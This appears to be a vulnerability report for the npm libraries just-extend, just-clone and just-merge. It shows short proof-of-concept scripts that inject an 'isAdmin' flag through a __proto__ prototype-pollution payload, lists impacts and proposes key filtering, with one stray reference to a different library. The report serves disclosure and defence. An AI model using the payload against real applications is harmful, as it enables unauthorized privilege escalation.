Security: Prototype poisoning in just-extend, just-clone, just-merge

[xclow3n]

POC:

import extend from 'just-extend';
const defaultPermissions = {
    read: true,
    write: false,
    delete: false,
};

const payload = JSON.parse('{"__proto__": { "isAdmin": true }}');

const userPermissions = extend({}, defaultPermissions, payload);

console.log('User Permissions:', userPermissions);
console.log(userPermissions['isAdmin'])

if (userPermissions.isAdmin) {
    console.log('User has admin access');
} else {
    console.log('User does not have admin access');
}

This code demonstrates how prototype poisoning can occur by merging an object containing a proto property with default permissions using the merge-anything library. The isAdmin property is injected into the object's prototype.

• Unauthorized Access: Users can gain elevated permissions without proper authorization.
• Security Breach: Compromised data integrity and potential for privilege escalation.
• Inconsistent Behavior: Application logic relying on permissions can be bypassed, leading to unpredictable behavior and security vulnerabilities.

Mitigation

• Specifically check for keys like "proto", "prototype", "constructor"

Since this library has a lot of weekly downloads so there might multiple use cases that might be effected by this bug

[xclow3n]

just-clone is also vulnerable to same thing

import clone from 'just-clone';

var obj = JSON.parse('{"__proto__":{"isAdmin":true}}');
var objClone = clone(obj);

console.log(objClone.isAdmin)

just-merge poc

var payload = JSON.parse('{"__proto__":{"isAdmin":true}}');
import merge from 'just-merge';

const extended = merge({}, payload); 

console.log(extended.isAdmin)